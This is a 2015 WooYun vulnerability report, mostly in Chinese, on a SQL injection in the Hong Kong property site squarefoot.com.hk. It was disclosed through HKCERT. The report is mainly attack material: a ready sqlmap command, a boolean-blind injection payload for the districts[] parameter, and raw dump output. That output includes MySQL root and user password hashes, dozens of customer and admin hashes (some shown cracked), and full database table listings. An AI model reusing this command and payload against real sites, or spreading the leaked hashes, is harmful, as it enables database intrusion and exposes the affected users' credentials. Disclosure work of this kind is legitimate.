漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:Square Foot online某處存在SQL插入攻擊(DBA權限;root密碼泄露;數千萬條網站記錄泄露;大量用戶密碼泄露)(香港地區)
提交时间:2015-11-11 10:10
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理
Tags标签:
无
漏洞详情 披露状态:
2015-11-11: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
简要描述: Square Foot online is an independent website, promoting and showcasing properties for sale and rent from Hong Kong's leading independent real estate agents. The aim of squarefoot.com.hk is to ensure that a property is given the most effective exposure to sell or let as quickly as possible, using a coherent and user friendly online platform. The website is home to the leading industry real estate agents, who actively upload their property listings in the Hong Kong and international property sections. The property listings are regularly monitored to ensure that the end user is privy to the most up to date and accurate database of properties available in this market. squarefoot.com.hk is a leading media brand in Hong Kong that focuses on all property related matters, and targeted towards the English-reading population of Hong Kong, both expatriate and Asian. If you are selling or letting your home, ask your property agent to advertise your property on squarefoot.com.hk. It's convenient, easy-to-use and an effective means to display your property to a mass audience, both inside and outside of Hong Kong. If you are interested in advertising on our website, please contact us for our competitive rates and more information on +852 3965 4300 or email [email protected] . In addition, we welcome any feedback that you may have to help us constantly improve our site. Thank you. Read more at http://www.squarefoot.com.hk/section/about-us/#I31PrcIxGfytVlV3.99
详细说明: 地址:http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B
python sqlmap.py -u "http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B" -p districts[] --technique=BT --random-agent --batch --count --search -C pass
Database: sf-www +-----------------------------------------------+---------+ | Table | Entries | +-----------------------------------------------+---------+ | sqft_xml_record_detail | 39164263 | | sqft_xml_record | 24016093 |
漏洞证明:
--- Parameter: districts[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: area=1&districts[]=95) AND 3345=3345 AND (3668=3668&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B --- web server operating system: Linux CentOS 5.10 web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: MySQL >= 5.0.0 current user: 'sf-www@%' current user is DBA: True database management system users [4]: [*] 'munin'@'localhost' [*] 'root'@'**.**.**.**' [*] 'root'@'localhost' [*] 'sf-www'@'%' database management system users password hashes: [*] munin [1]: password hash: *95D29F091A8FA51345E5507E3FDF2BBCFF3E619D [*] root [1]: password hash: *DF8B6D01CDC2E63465E13927EF6317CFCF370863 [*] sf-www [1]: password hash: *8D6D4EA7D1D87A779624A0324EB15169D4B17A8B sqlmap resumed the following injection point(s) from stored session: --- Parameter: districts[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: area=1&districts[]=95) AND 3345=3345 AND (3668=3668&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B --- web server operating system: Linux CentOS 5.10 web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: MySQL 5 Database: sf-disable +-----------------------------------------------+---------+ | Table | Entries | +-----------------------------------------------+---------+ | sqft_properties | 106626 | +-----------------------------------------------+---------+ Database: designidea +-----------------------------------------------+---------+ | Table | Entries | +-----------------------------------------------+---------+ | image_tags | 11544 | | sqft_image_upload_tmp | 3616 | | images | 2875 | | project_tags | 1366 | | images20140825 | 1138 | | sqft_news | 557 | | customers_sessions | 331 | | configuration | 261 | | countries | 239 | | sessions | 236 | | project | 185 | | zones | 181 | | products_description | 84 | | sqft_news_20141016 | 73 | | categories_description | 63 | | customers | 48 | | action_recorder | 40 | | products_options_values | 33 | | manufacturers_info | 30 | | contact_history | 29 | | project_tag_categories | 29 | | products | 28 | | products_to_categories | 28 | | images_tag_categories | 27 | | categories | 21 | | customers_favourites | 21 | | district | 18 | | configuration_group | 15 | | products_options | 15 | | products_attributes | 13 | | sec_directory_whitelist | 13 | | orders_status | 12 | | products_options_values_to_products_options | 11 | | manufacturers | 10 | | tag_type | 10 | | profile_type | 8 | | address_format | 5 | | products_images | 4 | | specials | 4 | | languages | 3 | | currencies | 2 | | administrators | 1 | | banners | 1 | | banners_history | 1 | | counter | 1 | | geo_zones | 1 | | products_attributes_download | 1 | | reviews | 1 | | reviews_description | 1 | | tax_class | 1 | | tax_rates | 1 | | whos_online | 1 | | zones_to_geo_zones | 1 | +-----------------------------------------------+---------+ Database: performance_schema +-----------------------------------------------+---------+ | Table | Entries | +-----------------------------------------------+---------+ | setup_consumers | 8 | | performance_timers | 5 | | setup_timers | 1 | +-----------------------------------------------+---------+ Database: sf-www-20150616 +-----------------------------------------------+---------+ | Table | Entries | +-----------------------------------------------+---------+ | sqft_buildings_20150616 | 19914 | +-----------------------------------------------+---------+ Database: mysql +-----------------------------------------------+---------+ | Table | Entries | +-----------------------------------------------+---------+ | help_relation | 1009 | | help_topic | 510 | | help_keyword | 453 | | help_category | 40 | | `user` | 4 | | db | 1 | | proc | 1 | | proxies_priv | 1 | +-----------------------------------------------+---------+ Database: sf-www +-----------------------------------------------+---------+ | Table | Entries | +-----------------------------------------------+---------+ | sqft_xml_record_detail | 39164263 | | sqft_xml_record | 24016093 | | sqft_addresses_20130822 | 4086808 | | sqft_addresses | 3477077 | | sqft_user_histories | 2697923 | | sqft_properties_features | 2415272 | | phpbb_sessions | 2014661 | | sqft_wong | 1383214 | | sqft_wong_20151006 | 1380016 | | sqft_wong_20150520 | 1319189 | | sqft_wong2 | 1319122 | | sqft_wong_live2 | 1305379 | | sqft_wong_20150504 | 1298368 | | phpbb_topics_track | 704744 | | phpbb_topics_watch | 686978 | | sqft_properties_users | 621352 | | sqft_refertofriend | 618460 | | sqft_properties | 391997 | | sqft_contact_history | 342559 | | phpbb_posts | 320877 | | phpbb_topics_posted | 305590 | | phpbb_topics | 279830 | | phpbb_user_group | 237344 | | sqft_import_log | 176096 | | phpbb_users | 156278 | | `phpbb_users.20140924` | 151964 | | report_users | 142148 | | report_users_emarsys | 101945 | | sqft_overseas_properties | 87778 | | sqft_wong_test1 | 84846 | | sqft_wong_test2 | 79449 | | sqft_overseas_properties_backup | 70948 | | sqft_iphone_users | 69542 | | sqft_properties_upload_img_logs | 57941 | | sqft_buildings_matching_20141015 | 42691 | | sqft_buildings_matching_20141027_b4_update | 42691 | | sqft_web_saveprop | 34175 | | sqft_user_csv_formats | 31823 | | sqft_buildings_matching | 31163 | | sqft_buildings_old | 31163 | | sqft_buildings_matching_20140912 | 30332 | | sqft_buildings_matching_20140924 | 30332 | | sqft_buildings_matching_20140908 | 30309 | | pp_iphone_property_stat | 28244 | | sqft_properties_matching | 26502 | | sqft_buildings | 20555 | | sqft_buildings_matching_sqft_to_gohome | 20543 | | sqft_buildings_20150908 | 20532 | | sqft_buildings_20150714 | 19960 | | sqft_buildings_20150622_corrupted | 19957 | | sqft_buildings_20150622 | 19944 | | sqft_buildings_20150102 | 19311 | | sqft_buildings_20141223 | 19308 | | sqft_buildings_20141219 | 19296 | | sqft_buildings_20141217 | 19253 | | phpbb_log | 16867 | | `sqft_buildings_jack(original)` | 16500 | | sqft_buildings_jack_20140904 | 16037 | | sqft_prnewswire | 14837 | | phpbb_sessions_keys | 13668 | | gohome_buildings | 11007 | | sqft_buildings_matching_gohome_to_sqft | 11007 | | sqft_android_users | 10589 | | sqft_view_report | 10467 | | sqft_web_recent_search | 10388 | | sqft_subscriptions_addedbiglist | 9477 | | sqft_web_recentprop | 9450 | | phpbb_banlist | 8420 | | phpbb_users_login_log | 7443 | | phpbb_privmsgs_to | 7100 | | sqft_subscriptions | 6961 | | sqft_banners_sections | 6953 | | report_subscription_emails | 6804 | | sqft_subscriptions_users | 6593 | | sqft_subscriptions_ericbackup | 6589 | | sqft_buildings_change_log | 6578 | | sqft_unsubscription_history | 5900 | | sqft_iphone_monthly_district_leads_report | 5024 | | sqft_audit | 4935 | | sqft_servicedapartmentlayoutoptions | 4934 | | sqft_estate | 4901 | | sqft_premiere_track | 4683 | | phpbb_forums_track | 4550 | | sqft_haunted | 4216 | | oasis_iphone_property_stat | 4053 | | phpbb_confirm | 4005 | | sqft_emailalert | 3820 | | phpbb_privmsgs | 3563 | | sqft_android_monthly_district_leads_report | 3132 | | sqft_listinghistory | 2444 | | sqft_consultancy_agents_promo_codes | 2299 | | sqft_users | 2284 | | sqft_iphone_total_page_view | 2271 | | sqft_users20140729 | 2116 | | pp_iphone_users | 2021 | | sqft_users_20131230 | 1909 | | sqft_the_space_video_click_record | 1789 | | sqft_sections | 1772 | | sqft_buildings_add_requests | 1712 | | sqft_iphone_stat | 1687 | | sqft_banners | 1641 | | sqft_copy_image | 1601 | | pp_iphone_stat | 1489 | | sqft_web_save | 1464 | | sqft_iphone_banners_details | 1414 | | sqft_android_banners_details | 1411 | | sqft_buildings_add_requests_property_listings | 1407 | | sqft_vote2015_voter | 1247 | | sqft_vote2015_voter_option | 1247 | | sqft_users_backup | 1233 | | phpbb_bookmarks | 1170 | | oasis_iphone_stat | 1092 | | sqft_vote2014_voter | 985 | | sqft_vote2014_voter_option | 985 | | sqft_banners_backup | 983 | | sqft_android_stat | 923 | | sqft_android_total_page_view | 841 | | sqft_user_plans | 801 | | sqft_the_space_life_style | 782 | | sqft_school_kindergarten | 735 | | sqft_news | 712 | | sqft_month_report | 684 | | sqft_newdevelopment_news_nw_link | 569 | | sqft_newdevelopment_news_nw | 548 | | sqft_buildings_add_requests_20141120 | 540 | | sqft_newdevelopment_news_nw_bkup | 539 | | sqft_school_primary | 501 | | sqft_premiere | 484 | | oasis_iphone_users | 457 | | sqft_school_secondary | 457 | | phpbb_users_info | 450 | | sqft_users_districts | 449 | | oncc_report_uid | 414 | | phpbb_acl_roles_data | 395 | | sqft_vote2013_voter_option | 395 | | sqft_vote2013_voter | 354 | | phpbb_users_reset_password | 350 | | sqft_servicedapartments_options | 344 | | phpbb_acl_groups | 334 | | sqft_mod_ap_addresses | 314 | | sqft_buildings_deleted_records | 295 | | phpbb_config | 262 | | sqft_news_backup | 249 | | sqft_countries | 243 | | sqft_vote2012_voter_option | 243 | | sqft_nationalities | 240 | | sqft_random_find_an_agent | 240 | | sqft_vote2012_voter | 234 | | sqft_users_exclude | 225 | | pp_iphone_total_page_view | 215 | | sqft_newdevelopment | 207 | | phpbb_modules | 199 | | sqft_user_csv_translations | 181 | | sqft_servicedapartments | 179 | | sqft_bannergroups | 177 | | sqft_consultancy_agents_orders_districts | 173 | | sqft_groups_permissions | 162 | | sqft_vote_dev | 158 | | sqft_school_international | 154 | | sqft_servicedapartmentlayouts | 150 | | sqft_catagories_companies | 149 | | sqft_companies | 149 | | sqft_iphone_monthly_report | 144 | | sqft_wong_deleted_records | 134 | | sqft_translates | 125 | | sqft_translates_backup | 125 | | sqft_web_footer | 123 | | oasis_iphone_total_page_view | 122 | | sqft_vote_2010 | 119 | | phpbb_acl_options | 117 | | sqft_districts | 106 | | sqft_districts_backup | 101 | | sqft_vote | 101 | | sqft_districts_20141223 | 100 | | sqft_servicedapartments_users | 99 | | gohome_districts | 95 | | sqft_internationals_users | 92 | | sqft_user_csv_translations1 | 91 | | gohome_buildings_matching_log | 85 | | phpbb_poll_options | 83 | | sqft_newdeveloper | 80 | | sqft_random_properties | 80 | | sqft_internationals | 76 | | sqft_features | 72 | | sqft_bannerlayouts | 71 | | sqft_survey2011 | 69 | | sqft_vote2014_nominee | 69 | | sqft_c21book | 68 | | sqft_ppsurvery | 67 | | phpbb_extensions | 66 | | phpbb_profile_fields_data | 66 | | sqft_developments_new | 61 | | sqft_permissions | 61 | | sqft_updates | 60 | | sqft_vote2015_nominee | 60 | | sqft_vote2015_nominee1 | 60 | | sqft_refer5friend | 58 | | sqft_developments_users | 57 | | sqft_transactions_estate_cache | 53 | | sqft_transactions_district_cache | 51 | | phpbb_bots | 50 | | pp_iphone_monthly_report | 48 | | sqft_developments | 48 | | oasis_iphone_monthly_report | 46 | | sqft_catagories | 44 | | sqft_the_space_author | 44 | | sqft_android_monthly_report | 43 | | sqft_properties_approval | 43 | | phpbb_smilies | 42 | | sqft_district_leader_users | 40 | | sqft_findingevent | 39 | | sqft_user_jobs | 37 | | phpbb_forums | 36 | | sqft_banners_liv_group | 35 | | sqft_banners_elite | 31 | | sqft_fengshui | 29 | | sqft_the_space | 28 | | sqft_sclipboard | 26 | | sqft_suspend_account_log | 26 | | sqft_consultancy_agents | 25 | | sqft_newdevelopment_news | 25 | | phpbb_acl_roles | 24 | | sqft_android_banners | 24 | | sqft_iphone_banners | 24 | | sqft_user_cities | 24 | | sqft_vote2014_category | 23 | | phpbb_drafts | 22 | | sqft_avignon | 22 | | sqft_the_space_section | 22 | | sqft_layouts | 21 | | sqft_overseas_properties_search_region | 21 | | sqft_vote2015_category | 20 | | sqft_banners_prime_miami | 19 | | sqft_catagories_sponsors | 19 | | sqft_properties_last_old_record | 18 | | sqft_school_districts | 18 | | sqft_updates_sections | 17 | | sqft_aastock | 16 | | sqft_transactions_new_home_cache | 15 | | sqft_fengshui_test | 13 | | sqft_articles | 12 | | pp_iphone_branch_list | 11 | | sqft_banners_cbre | 11 | | sqft_banners_henry_wiltshire | 11 | | sqft_banners_richmonts | 11 | | sqft_banners_starfish | 11 | | sqft_banners_tclhk_luxury_projects_miami | 11 | | sqft_web_users | 11 | | phpbb_icons | 10 | | sqft_banners_citylife | 10 | | sqft_currencies | 10 | | sqft_hamptons | 10 | | sqft_overseas_properties_type | 10 | | phpbb_extension_groups | 9 | | sqft_banners_city_lcp2 | 9 | | sqft_banners_westbank | 9 | | sqft_consultancy_agents_orders | 9 | | sqft_pclipboard | 9 | | sqft_press_release | 9 | | sqft_showcase | 9 | | sqft_user_income | 9 | | oasis_iphone_agent_list | 7 | | phpbb_groups | 7 | | sqft_audit_action | 7 | | sqft_featuregroups | 7 | | phpbb_profile_fields_lang | 6 | | pp_iphone_sole_agent_properties | 6 | | sqft_banners_chined_international | 6 | | sqft_buildings_testing | 6 | | sqft_audit_section | 5 | | sqft_developers | 5 | | sqft_plans | 5 | | sqft_search_alert | 5 | | sqft_servicedapartmentspecialfeatures | 5 | | phpbb_reports_reasons | 4 | | sqft_android_email | 4 | | sqft_banners_bacc_lead | 4 | | sqft_banners_meridien_group | 4 | | sqft_banners_sumitomo_lcp3 | 4 | | sqft_banners_tcl_lcp | 4 | | sqft_contacts | 4 | | sqft_fengshui_section | 4 | | sqft_groups | 4 | | sqft_iphone_email | 4 | | sqft_overseas_product_type | 4 | | sqft_transaction_region_cache | 4 | | `table` | 3 | | phpbb_attachments | 3 | | phpbb_lang | 3 | | phpbb_profile_lang | 3 | | sqft_consultancy_agents_packages | 3 | | sqft_hotproperties | 3 | | sqft_internationals_new | 3 | | phpbb_reports | 2 | | phpbb_zebra | 2 | | sqft_banners_platinumrise | 2 | | sqft_building_features | 2 | | sqft_properties_exclude | 2 | | sqft_sizeunits | 2 | | sqft_system | 2 | | oncc_report | 1 | | phpbb_acl_users | 1 | | phpbb_bbcodes | 1 | | phpbb_profile_fields | 1 | | phpbb_ranks | 1 | | phpbb_styles | 1 | | phpbb_styles_imageset | 1 | | phpbb_styles_theme | 1 | | sqft_consultancy_agents_promo_codes_sets | 1 | +-----------------------------------------------+---------+ Database: information_schema +-----------------------------------------------+---------+ | Table | Entries | +-----------------------------------------------+---------+ | INNODB_BUFFER_PAGE | 655359 | | INNODB_BUFFER_PAGE_LRU | 569523 | | COLUMNS | 5447 | | STATISTICS | 1083 | | KEY_COLUMN_USAGE | 541 | | PARTITIONS | 483 | | TABLES | 483 | | TABLE_CONSTRAINTS | 441 | | SESSION_VARIABLES | 329 | | GLOBAL_VARIABLES | 317 | | GLOBAL_STATUS | 312 | | SESSION_STATUS | 312 | | COLLATION_CHARACTER_SET_APPLICABILITY | 197 | | COLLATIONS | 197 | | USER_PRIVILEGES | 86 | | CHARACTER_SETS | 39 | | PLUGINS | 23 | | PROCESSLIST | 14 | | PARAMETERS | 10 | | ENGINES | 9 | | SCHEMATA | 7 | | REFERENTIAL_CONSTRAINTS | 6 | | INNODB_CMP | 5 | | INNODB_CMP_RESET | 5 | | INNODB_CMPMEM | 5 | | INNODB_CMPMEM_RESET | 5 | | INNODB_TRX | 4 | | INNODB_BUFFER_POOL_STATS | 1 | | ROUTINES | 1 | | SCHEMA_PRIVILEGES | 1 | +-----------------------------------------------+---------+ columns LIKE 'pass' were found in the following databases: Database: designidea Table: administrators [1 column] +---------------+ | Column | +---------------+ | user_password | +---------------+ Database: designidea Table: customers_info [2 columns] +---------------------+ | Column | +---------------------+ | password_reset_date | | password_reset_key | +---------------------+ Database: designidea Table: customers [1 column] +--------------------+ | Column | +--------------------+ | customers_password | +--------------------+ Database: sf-www Table: sqft_users [1 column] +----------+ | Column | +----------+ | password | +----------+ Database: sf-www Table: phpbb_users [4 columns] +-------------------+ | Column | +-------------------+ | user_newpasswd | | user_pass_convert | | user_passchg | | user_password | +-------------------+ Database: sf-www Table: sqft_subscriptions_users [1 column] +---------------+ | Column | +---------------+ | user_password | +---------------+ Database: sf-www Table: sqft_web_users [1 column] +----------+ | Column | +----------+ | password | +----------+ Database: sf-www Table: sqft_users_20131230 [1 column] +----------+ | Column | +----------+ | password | +----------+ Database: sf-www Table: report_users_emarsys [1 column] +--------------------+ | Column | +--------------------+ | password_generated | +--------------------+ Database: sf-www Table: sqft_users_backup [1 column] +----------+ | Column | +----------+ | password | +----------+ Database: sf-www Table: report_users [1 column] +----------+ | Column | +----------+ | password | +----------+ Database: sf-www Table: phpbb_forums [1 column] +----------------+ | Column | +----------------+ | forum_password | +----------------+ Database: sf-www Table: phpbb_bbcodes [4 columns] +---------------------+ | Column | +---------------------+ | first_pass_match | | first_pass_replace | | second_pass_match | | second_pass_replace | +---------------------+ Database: sf-www Table: phpbb_users.20140924 [4 columns] +-------------------+ | Column | +-------------------+ | user_newpasswd | | user_pass_convert | | user_passchg | | user_password | +-------------------+ Database: sf-www Table: sqft_users20140729 [1 column] +----------+ | Column | +----------+ | password | +----------+ Database: mysql Table: user [1 column] +----------+ | Column | +----------+ | Password | +----------+ Database: mysql Table: servers [1 column] +----------+ | Column | +----------+ | Password | +----------+ Database: designidea Table: administrators [1 entry] +--------------------------------------------+ | user_password | +--------------------------------------------+ | $P$Ds9UCy52Z4v4Jumj5.JblC8mxjONDX/ (admin) | +--------------------------------------------+ Database: designidea Table: customers_info [0 entries] +---------------------+--------------------+ | password_reset_date | password_reset_key | +---------------------+--------------------+ +---------------------+--------------------+ Database: designidea Table: customers [48 entries] +---------------------------------------------+ | customers_password | +---------------------------------------------+ | $P$D/o8qQvZCZ9tDJt.4.1hP7y0iLKmIj1 () | | $P$D2dyynZpjBOEpm.8VG4F4vg/sFaGbf/ | | $P$D3j7svUUgrthUGy1hYoY0ToLz8c0ve. () | | $P$D3plN5bxafZBCerSq6quMraVPF3Pfd/ (123456) | | $P$D6ocM896ufcXGtQj6hX9VPNdBEdIay0 (123456) | | $P$D7nuhjUrh/KYi.0uGOdWCxvE5vO60u. | | $P$D80WQuAxp0PqAdo2bnM9XDOwjTWH/O1 | | $P$D97v0NONt1l5kYjMUT3VGGgokteBKt1 | | $P$DaGiBt/Swhu3xb.EjQiJvEJRApX.ZQ. () | | $P$DaR01YnT24Lypua1JFT3wm/P.kb8tI1 (123456) | | $P$DaRyaGoX84cuhdCzC6AebmqG/EcRwY0 () | | $P$DbcH04ByWUemu19G9TqiucFNGQlKrK/ () | | $P$DbcH04ByWUemu19G9TqiucFNGQlKrK/ () | | $P$DcARmxi1jJ0CsNe7Ct1xQ10YjThRaF. | | $P$Dd8ALaWPNtUfYlJpTRB9OWTPRENGdd0 () | | $P$DDH.fl2n9tz4WITIc04yV5G2iLdAJQ. (123456) | | $P$DdKwzesc0K7cQTX3KnLBYE2vIRVXHm/ () | | $P$DEcNvrPy9G86SoYQg8eant/sGU.g7e/ | | $P$DF9R6ScSqvv8/Lx.ywoojWN2dikZoU1 () | | $P$DgsGNOxkQK6aKAq66EyhHDXu1OnwX00 () | | $P$DKqGhosw2Qi3MCkpMh.48r8VyqSSuZ/ | | $P$DKudN/aaEW8t/E8MM9hs/mR1oZHOAQ0 (123456) | | $P$DlbTnul7S/rs6SPNvNPh3ZsEY41PPD0 () | | $P$DldpafhYtpkr4KNzU75KCZR0tWTuUT1 | | $P$DlITxlqXNPNEm4fziIFdZIqnLrkE3N/ () | | $P$DLO4VXPJwwu/iaM4M184jgkdqh0aO7/ | | $P$DlTPvreyODI28OU3jHYGxPYXb.tYcM. () | | $P$Dm.RYeZa9fQgMQ3khbNKLDNVy67csx1 | | $P$Dn66xKZm2MPo9NXH5ubT2j1vVDARkV. | | $P$Do9FKQDhnl7ykY7pKpGNp1lX46dzPP/ | | $P$DofvWL4RIuvYJxlCD80AbJqCjdm1Al1 | | $P$DOVGE3V1G2yZUmAN3JaDP6MFGWz1cf/ | | $P$DqAz4x0N9Pb9zXT6Av1RCx/PKkcJbB0 () | | $P$DQBRf450n.gej9rmxiijm8ZuBt/EdN. | | $P$DqrxcBfIzUz0OP4JLETYICU/9uI9At1 () | | $P$DS8JyoW5/dzEwEI0RIj49HGJtribau. | | $P$DSCRzyTd1aIp0fkS4e/ivj3S4AsP0O0 | | $P$DSnG6aU48TBiMDBENbexLe0Dvgarz0/ | | $P$DSzyINeZ/2iuK/MrrmLqXayqIK3fp0/ | | $P$DU7oKrfz/ynFVm.z0HNAU.flxNwep80 | | $P$DurOVlhb/FvYX69iP/LJ6/YGohxKOK0 () | | $P$Dux3wRfjhHJRzoTth8g2Yq/ws4HkSw0 | | $P$DUxWxdrs6ln7y6sNFm/jK6BUInD1tZ0 () | | $P$DVVlSKYF8PrFsLX6y7TDjsALLa3gUp1 () | | $P$DxV75pJSjYi0ouLYhBIcs1qXSJag4g1 (123456) | | $P$DY.slHKp.cXP/Ql5zbFhdbb12X69FE0 | | $P$Dywr/WzzhU2VrfqacE4w3vo23FHaRw. |
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 危害等级:高
漏洞Rank:13
确认时间:2015-11-20 16:24
厂商回复: 已將漏洞報告給網站聯絡人
最新状态: 暂无